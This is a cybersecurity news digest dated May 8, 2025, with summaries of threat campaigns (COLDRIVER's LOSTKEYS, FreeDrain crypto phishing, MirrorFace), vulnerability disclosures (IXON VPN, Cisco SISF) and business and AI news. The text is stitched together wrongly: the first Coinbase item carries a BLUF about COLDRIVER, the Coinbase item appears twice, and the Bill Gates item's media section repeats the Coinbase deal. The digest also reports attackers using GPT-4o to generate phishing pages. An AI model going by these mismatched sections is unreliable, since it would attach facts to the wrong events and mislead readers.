Thursday, May 08, 2025 // (IG): BB // GITHUB // SN R&D
Coinbase to Acquire Deribit for $2.9B, Cementing Global Dominance in Crypto Derivatives
Bottom Line Up Front (BLUF): Google’s Threat Intelligence Group has identified a new malware campaign by Russian state-sponsored threat actor COLDRIVER. The campaign uses a custom tool dubbed LOSTKEYS to exfiltrate sensitive data from Western government, media, and NGO targets. It employs sophisticated social engineering and multi-stage PowerShell-based infection chains, with activity confirmed as recent as April 2025.
Analyst Comments: This acquisition is a strategic leap for Coinbase, aligning with anticipated demand from institutional investors as crypto markets gain regulatory clarity under the Trump administration. Deribit’s vast derivatives trading volume—over $1 trillion in 2024—positions Coinbase to rival traditional exchanges in financial product diversity. However, Deribit's offshore status raises questions about whether Coinbase will shift operations to the U.S., where regulatory risk remains fluid despite current deregulatory momentum. The move could trigger further consolidation in the crypto sector as exchanges race to capture institutional capital.
FROM THE MEDIA: Coinbase will pay $700 million in cash and the remainder in stock to acquire Deribit, a Dubai-based crypto derivatives exchange. Deribit is the global leader in crypto options trading, a sector Coinbase predicts will experience a boom akin to the 1990s equity options surge. This deal follows rising crypto prices, with Bitcoin exceeding $100,000 on the same day, buoyed by pro-crypto policies under President Trump. The transaction is expected to close by year-end, pending regulatory approval. Deribit’s CEO, Luuk Strijers, said the acquisition will expand opportunities across spot, futures, perpetuals, and options. Coinbase's stock rose 5% following the announcement.
READ THE STORY: FT
FreeDrain Phishing Campaign Exploits SEO and Free Hosting to Drain Crypto Wallets
Bottom Line Up Front (BLUF): Security researchers have identified FreeDrain, a global-scale cryptocurrency phishing operation that leverages SEO manipulation, free-tier web services, and generative AI to steal wallet seed phrases. Over 38,000 subdomains have been used to impersonate legitimate crypto platforms and lure victims through high-ranking search results.
Analyst Comments: By abusing free web infrastructure and manipulating SEO, these campaigns easily bypass traditional detection mechanisms. Using generative AI tools like GPT-4o to generate phishing content underscores how adversaries integrate advanced technologies into low-cost, high-impact attacks. As attackers diversify their toolsets and tactics—from Discord hijacking to malvertising campaigns—the crypto space remains particularly vulnerable due to its decentralized nature and lack of strong user-side security mechanisms.
FROM THE MEDIA: The campaign employs over 38,000 subdomains hosted on GitHub Pages, Webflow, and Amazon S3 to deliver fake wallet interfaces via high-ranking search results. Victims searching for queries like “Trezor wallet balance” are redirected through deceptive CAPTCHAs and lure pages before landing on phishing sites that harvest seed phrases. Researchers linked the campaign to actors working in the Indian Standard Time zone based on commit patterns. The attack flow is seamless, automated, and drains funds within minutes. The phishing pages are often generated using LLMs like OpenAI’s GPT-4o, while SEO spamdexing tactics ensure their visibility. Parallel investigations by Check Point and Bitdefender reveal similar crypto-targeted attacks using Discord and Facebook ads, with the Inferno Drainer toolkit alone compromising 30,000 wallets between September 2024 and March 2025, resulting in $9 million in theft.
READ THE STORY: THN
FBI Cyber Division Chief Bryan Vorndran to Retire Amid Growing Focus on Threat Disruption
Bottom Line Up Front (BLUF): Bryan Vorndran, assistant director of the FBI’s Cyber Division since 2021, is expected to retire soon. This marks the end of a pivotal tenure that saw the agency shift toward more proactive cyber threat disruption strategies. His departure is unrelated to recent personnel shakeups under the Trump administration and stems from retirement eligibility.
Analyst Comments: Under his watch, the bureau increased operational tempo through joint operations, international partnerships, and infrastructure takedowns—often in collaboration with CISA. His advocacy for greater FBI involvement in incident reporting frameworks helped shape landmark legislation (CIRCIA) that reflects the growing integration of law enforcement in national cyber defense. His successor will likely face pressure to maintain momentum in a volatile threat landscape, especially amid increasing politicization of federal cybersecurity agencies.
FROM THE MEDIA: During his tenure, the bureau expanded its cyber disruption tactics, coordinating 17 global operations last year, including takedowns of BreachForums and a China-linked botnet. Vorndran co-chaired the Joint Ransomware Task Force with CISA, advocating for real-time intelligence sharing between law enforcement and federal cyber agencies. His approach emphasized arresting cybercriminals and dismantling the infrastructure, financial networks, and communications that enable their operations. His departure comes as CIRCIA’s final implementation looms, a regulation he helped shape to ensure the FBI remains central to federal cyber response efforts.
READ THE STORY: The Record
Dutch Intelligence Chief Warns China’s Cyber Threat Surpasses Russia’s as European Tensions Mount
Bottom Line Up Front (BLUF): Vice Adm. Peter Reesink, head of Dutch military intelligence (MIVD), has warned that China now poses a greater cyber threat to Europe than Russia, citing Beijing’s advanced and opaque cyber capabilities. The warning comes amid revelations of Chinese intrusions in European networks and Russia’s continued hybrid aggression and military buildup along NATO’s borders.
Analyst Comments: While Russia remains the more immediate kinetic threat, particularly amid its war in Ukraine and cyberattacks during European elections, Reesink’s remarks highlight a growing consensus that China’s long-term cyber capabilities and infiltration efforts present a more sophisticated and less understood risk. The alignment of Russian and Chinese strategic interests adds further urgency for Europe to enhance cyber resilience and reduce dependency on U.S. intelligence, particularly as Trump's return to power introduces transatlantic uncertainty.
FROM THE MEDIA: Vice Adm. Peter Reesink stated that China’s cyber infrastructure is “more threatening than Russia,” citing its complexity and stealth. MIVD’s latest report details Chinese cyber group Salt Typhoon’s infiltration of U.S. telecoms and similar behavior observed in Europe, targeting at least 10 countries. While Russia continues to conduct hybrid operations, including cyberattacks during the 2024 European elections, Reesink emphasized that China's capabilities are less visible but deeply embedded. He also voiced concern over Donald Trump’s consolidation of control over U.S. intelligence, prompting European agencies to reassess intelligence-sharing protocols. Russia’s military buildup near NATO borders and increased defense spending further underscore the dual-threat environment facing Europe.
READ THE STORY: POLITICO
Russia-Backed COLDRIVER Hackers Deploy LOSTKEYS Malware in Targeted Espionage Attacks
Bottom Line Up Front (BLUF): Google’s Threat Intelligence Group has identified a new malware campaign by Russian state-sponsored threat actor COLDRIVER. The campaign uses a custom tool dubbed LOSTKEYS to exfiltrate sensitive data from Western government, media, and NGO targets. It employs sophisticated social engineering and multi-stage PowerShell-based infection chains, with activity confirmed as recent as April 2025.
Analyst Comments: Using “ClickFix” social engineering and VM evasion techniques highlights the group’s growing technical sophistication and operational selectivity. The malware’s ability to harvest documents and system metadata presents a direct espionage risk to NATO-aligned nations and civil society actors. Organizations must heighten defenses against clipboard-based script lures and adopt sandboxing, endpoint monitoring, and behavioral analysis to counter stealthy malware delivery methods.
FROM THE MEDIA: The COLDRIVER APT, linked to Russia’s FSB and also known as Star Blizzard or Callisto Group, has been observed deploying LOSTKEYS malware in espionage campaigns since late 2023. Victims are lured into running clipboard PowerShell scripts via fake CAPTCHA prompts—a tactic dubbed “ClickFix”—which initiate a multi-stage chain culminating in LOSTKEYS deployment. The malware targets files by extension and directory, and transmits system information to command-and-control infrastructure hosted at cloudmediaportal[.]com and 165.227.148[.]68. The tool has been selectively deployed against high-value individuals, and variants were disguised as legitimate software, such as Maltego. Google has issued Safe Browsing warnings and recommends enabling Enhanced Protection in Chrome to mitigate such threats.
READ THE STORY: BleepingComputer // GBhackers
Coinbase to Acquire Deribit for $2.9B, Cementing Global Dominance in Crypto Derivatives
Bottom Line Up Front (BLUF): Google’s Threat Intelligence Group has identified a new malware campaign by Russian state-sponsored threat actor COLDRIVER. The campaign uses a custom tool dubbed LOSTKEYS to exfiltrate sensitive data from Western government, media, and NGO targets. It employs sophisticated social engineering and multi-stage PowerShell-based infection chains, with activity confirmed as recent as April 2025.
Analyst Comments: This acquisition is a strategic leap for Coinbase, aligning with anticipated demand from institutional investors as crypto markets gain regulatory clarity under the Trump administration. Deribit’s vast derivatives trading volume—over $1 trillion in 2024—positions Coinbase to rival traditional exchanges in financial product diversity. However, Deribit's offshore status raises questions about whether Coinbase will shift operations to the U.S., where regulatory risk remains fluid despite current deregulatory momentum. The move could trigger further consolidation in the crypto sector as exchanges race to capture institutional capital.
FROM THE MEDIA: Coinbase will pay $700 million in cash and the remainder in stock to acquire Deribit, a Dubai-based crypto derivatives exchange. Deribit is the global leader in crypto options trading, a sector Coinbase predicts will experience a boom akin to the 1990s equity options surge. This deal follows rising crypto prices, with Bitcoin exceeding $100,000 on the same day, buoyed by pro-crypto policies under President Trump. The transaction is expected to close by year-end, pending regulatory approval. Deribit’s CEO, Luuk Strijers, said the acquisition will expand opportunities across spot, futures, perpetuals, and options. Coinbase's stock rose 5% following the announcement.
READ THE STORY: FT
MirrorFace Targets Japan and Taiwan with ROAMINGMOUSE and Upgraded ANEL Malware
Bottom Line Up Front (BLUF): The Chinese state-aligned APT group MirrorFace (aka Earth Kasha) has intensified cyber espionage efforts targeting government institutions in Japan and Taiwan using a spear-phishing campaign that deploys new versions of ANEL and NOOPDOOR malware. A newly observed dropper, ROAMINGMOUSE, facilitates the infection chain, while the updated ANEL includes in-memory execution of Cobalt Strike components.
Analyst Comments: MirrorFace’s latest campaign underscores a tactical shift toward more modular, stealthy implants and advanced in-memory payload execution, likely aimed at extending post-compromise persistence while avoiding detection. Using legitimate OneDrive links and compromised email accounts in spear-phishing efforts demonstrates increasing operational maturity. The integration of DNS-over-HTTPS in NOOPDOOR reflects a broader trend among APTs toward encrypting C2 traffic to frustrate traditional network monitoring tools. Expect continued pressure on regional targets aligned with China’s geopolitical interests, including surveillance on policy shifts, defense posture, and foreign alliances.
FROM THE MEDIA: Spear-phishing emails containing legitimate OneDrive links were used to deliver ZIP archives embedded with macro-laden Excel files and the ROAMINGMOUSE dropper. Once executed, ROAMINGMOUSE unpacks an encrypted payload and side-loads a malicious DLL (ANELLDR) via a legitimate executable to install ANEL. The upgraded ANEL includes a new feature enabling in-memory execution of Beacon Object Files (BOFs) for Cobalt Strike. In some cases, SharpHide was used to deploy NOOPDOOR, a backdoor featuring DNS-over-HTTPS for stealthy command-and-control. The campaign reflects persistent, targeted efforts to collect intelligence from strategic adversaries in East Asia.
READ THE STORY: THN
IXON VPN Vulnerabilities Allow Privilege Escalation Across Windows, Linux, and macOS Systems
Bottom Line Up Front (BLUF): Researchers have disclosed two critical vulnerabilities (CVE-2025-26168 and CVE-2025-26169) in the IXON VPN client affecting versions ≤1.4.3, enabling local attackers to escalate privileges to SYSTEM or root on major operating systems. IXON has released a patched version (1.4.4), urging immediate updates to prevent exploitation in industrial and enterprise networks.
Analyst Comments: The vulnerability is especially dangerous in operational technology (OT) environments, where VPN clients often bridge internal and remote systems. Its exploitation could lead to lateral movement across sensitive industrial control networks, posing safety and uptime risks. Vendors must prioritize secure privilege boundaries and cryptographic validation mechanisms as reliance on remote access tools grows. Organizations should treat this as a high-priority vulnerability and move quickly to patch, audit logs, and implement defense-in-depth measures.
FROM THE MEDIA: IXON VPN clients for Windows, Linux, and macOS contain privilege escalation flaws stemming from insecure storage and execution of OpenVPN configuration files. Researchers Andreas Vikerup and Dan Rosenqvist of Shelltrail identified the vulnerability, which enables attackers to replace temporary config files in shared directories with malicious content, tricking the VPN client into executing code with elevated permissions. Affected systems can be fully compromised if exploited, especially in shared environments such as managed service providers or factories. The vulnerability was assigned a CVSS 8.1. IXON has released version 1.4.4 with a fix, which includes moving config storage to user-specific directories and adding signature verification.
READ THE STORY: GBhackers
Bill Gates Commits $200B to Global Health by 2045 Amid Threats from Trump-Era Policy Shifts
Bottom Line Up Front (BLUF): Bill Gates has announced plans to give away nearly all his fortune—$200 billion—through the Gates Foundation over the next 20 years, aiming to close it by 2045. However, his ambitious global health goals face mounting political challenges, including steep U.S. foreign aid cuts and potential loss of the foundation’s tax-exempt status under the Trump administration.
Analyst Comments: Gates' strategy to "spend down" rather than perpetually endow the foundation marks a bold shift in philanthropic planning, focusing on urgency and impact over legacy. Yet, even his record-breaking wealth may not counterbalance the severe rollback of governmental aid, particularly the dismantling of USAID under Elon Musk’s and Trump’s influence. With Trump’s administration signaling hostility toward global development goals and philanthropic tax privileges, the very framework enabling Gates' ambitions may be eroded. His cautious stance toward Trump—despite deep ideological rifts—signals an attempt to preserve influence in a hostile political environment.
FROM THE MEDIA: Coinbase will pay $700 million in cash and the remainder in stock to acquire Deribit, a Dubai-based crypto derivatives exchange. Deribit is the global leader in crypto options trading, a sector Coinbase predicts will experience a boom akin to the 1990s equity options surge. This deal follows rising crypto prices, with Bitcoin exceeding $100,000 on the same day, buoyed by pro-crypto policies under President Trump. The transaction is expected to close by year-end, pending regulatory approval. Deribit’s CEO, Luuk Strijers, said the acquisition will expand opportunities across spot, futures, perpetuals, and options. Coinbase's stock rose 5% following the announcement.
READ THE STORY: FT
Cisco Patches Critical SISF Vulnerability in IOS Software That Enables DHCPv6-Based DoS Attacks
Bottom Line Up Front (BLUF): Cisco has issued security updates to fix a critical vulnerability in its Switch Integrated Security Features (SISF) affecting IOS, IOS XE, NX-OS, and AireOS software. The flaw allows unauthenticated, adjacent attackers to trigger device reloads via crafted DHCPv6 packets, potentially disrupting network operations.
Analyst Comments: While the requirement for network adjacency limits the attack’s reach, its potential to crash core switching and wireless infrastructure in enterprise environments makes it a high-priority risk. With no workaround available, the urgency of applying Cisco’s patches cannot be overstated. Organizations should also consider segmenting management planes and monitoring for anomalous DHCPv6 traffic to detect early signs of exploitation.
FROM THE MEDIA: Cisco disclosed a critical denial-of-service (DoS) vulnerability in SISF components across several networking platforms. The flaw arises from improper handling of DHCPv6 packets, allowing an unauthenticated attacker on the same local network to send malicious packets that force vulnerable devices to reload. Impacted platforms include Cisco IOS and IOS XE Software, NX-OS running on Nexus 3000/7000/9000 (in standalone mode), and WLC AireOS Software. Cisco has released patches for all affected versions, noting that no exploitation has been reported in the wild. Admins are urged to update immediately and can verify exposure using built-in diagnostic commands like show ipv6 snooping policies.
READ THE STORY: GBhackers
OpenAI Hires Instacart CEO Fidji Simo to Lead Consumer-Facing Applications
Bottom Line Up Front (BLUF): OpenAI has appointed Instacart CEO Fidji Simo as CEO of its Applications division, signaling a shift toward scaling consumer-facing AI products. A former Facebook executive, Simo will report directly to OpenAI CEO Sam Altman and formally assume the role later this year.
Analyst Comments: OpenAI’s strategic pivot to prioritize end-user monetization over traditional B2B or enterprise adoption, especially as AI pilot projects struggle to demonstrate ROI. Simo’s background in consumer platforms like Facebook and Instacart positions her to steer product-market fit for tools like ChatGPT, potentially accelerating mainstream adoption and revenue. The timing also coincides with OpenAI’s broader efforts to ease financial pressure after a $5B loss in 2024. With rising subscription offerings and a tighter consumer focus, OpenAI seems poised to diversify its revenue streams—if it can overcome the still-nascent state of real-world AI utility.
FROM THE MEDIA: Simo, who has served on OpenAI's board since 2024, will take the helm later this year and report directly to CEO Sam Altman. The move allows Altman to concentrate on research, compute infrastructure, and AI safety while Simo leads product development for consumer-facing tools. The announcement follows OpenAI’s decision to retain its nonprofit oversight structure after backlash to a planned governance shift. Financially, OpenAI seeks to reduce last year’s $5B loss with new revenue initiatives like its $200/month Deep Research subscription. Analysts see Simo’s appointment as a push to broaden the appeal beyond business users and capitalize on growing public interest in generative AI.
READ THE STORY: The Register
Items of interest
US Retains AI Leadership Over China Despite R1 Breakthrough, Insikt Group Finds
Bottom Line Up Front (BLUF): China remains behind the US in overall artificial intelligence (AI) capabilities despite its recent advancements, including the release of the DeepSeek R1 model in early 2025. According to Insikt Group’s comprehensive assessment, China’s AI ecosystem lags in funding, talent, hardware, and diffusion capacity. However, it continues to close the gap through open-source innovation, government-backed investments, and aggressive industrial policy.
Analyst Comments: While the release of DeepSeek R1 marked a symbolic "Sputnik moment," Insikt’s analysis tempers fears of imminent AI supremacy by China. The US still leads private sector investment, access to elite talent, computing infrastructure, and core innovation. However, China's emphasis on diffusion, particularly via open-source distribution, and resilience in the face of export controls suggests a long-term competitive trajectory. Strategic risks remain, especially as China leverages economic espionage, regulatory advantages, and a state-aligned AI development model. The AI race is no longer solely about frontier models but national capacity to implement and operationalize them at scale.
FROM THE MEDIA: Despite China’s goal to lead in AI by 2030 and its January 2025 release of the DeepSeek R1 model — which caused a historic market loss for Nvidia — Insikt assesses that the US still leads in nearly all critical AI development pillars. These include venture capital funding, elite talent pools, hardware capabilities, and regulatory flexibility. China, however, is closing the performance gap and leads in generative AI patent filings. It also benefits from a synergistic collaboration between government, academia, and private companies, and is aggressively investing in its semiconductor capabilities to reduce reliance on US technologies. The report warns that the true battleground may be in AI diffusion, not just innovation, and urges Western entities to strengthen IP protections, export compliance, and global talent strategies.
READ THE STORY: RecordedFuture
We Investigated China’s Silicon Valley (It's Not What We Expected) (Video)
FROM THE MEDIA: What we saw was beyond anything we expected: Robots running hotels, EV adoption so widespread that gas cars are nearly extinct, AI integrated into factories, streets, and classrooms. Our trip broke a lot of the biases and myths we had about China.
Yuval Noah Harari: This Election Will Tear The Country Apart! AI Will Control You By 2034! (Video)
FROM THE MEDIA: Yuval Noah Harari is a best-selling author, public intellectual and Professor of History at the Hebrew University of Jerusalem. He is the author of multi-million bestseller books such as, ‘Sapiens: A Brief History of Humankind’ and ‘Homo Deus: A Brief History of Tomorrow’.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.